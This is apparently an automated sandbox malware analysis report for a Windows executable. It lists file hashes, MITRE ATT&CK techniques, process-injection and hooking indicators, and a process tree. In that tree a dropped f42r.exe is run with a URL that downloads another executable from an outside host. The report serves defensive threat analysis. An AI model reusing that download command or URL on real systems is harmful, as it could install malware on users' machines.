c2459b03a0c83c5c0d672cdf8bd47b341c4d2a30edeebd8f1b97eea30d6fd23b

Analysis

max time kernel
142s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
11/07/2024, 06:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe
Size

306KB
MD5

381e609130aefcb5643cedd9658ed4a5
SHA1

4c00d01b482332c1ec019e4cb50cde545376a8a0
SHA256

c2459b03a0c83c5c0d672cdf8bd47b341c4d2a30edeebd8f1b97eea30d6fd23b
SHA512

e3e3106c9e943fcd375b63255f544f44bb262f35fae26e3cadf69da47b14cb5d16582f2f931bf67fc21e81fe2cb50287a5df6a7ecd9c083562f76143dc4ab150
SSDEEP

6144:tTfFDbRnOTrt5JGXfEdyCwaeVEuClROTfFDbRnOTrt5J:D5OcqyCwrVEum+5O

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation	381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
4264	f42r.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4264	f42r.exe
4264	f42r.exe
4264	f42r.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 992 wrote to memory of 4264	992	381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe	86
PID 992 wrote to memory of 4264	992	381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe	86
PID 992 wrote to memory of 4264	992	381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe	86

C:\Users\Admin\AppData\Local\Temp\381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\381e609130aefcb5643cedd9658ed4a5_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:992
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f42r.exe

Filesize
228KB

MD5
7c9e6e3501b16c613cfa6fbbd814bc6f

SHA1
33630a78fba5401b183fcdef83ce6412bf14b02a

SHA256
7abe19430e454b3aa7763f198f24fb0be3d79cb9648d611f3b8859eae7d3a333

SHA512
e86cafacf173acc1e2d788d3e0bce432583d1cd4a45fe99d149fbc50480b883f85def021300843c73b8cbce512d2ef56f30ca5978c7d14720898f62b6dc7879d

Download Submit
memory/992-12-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download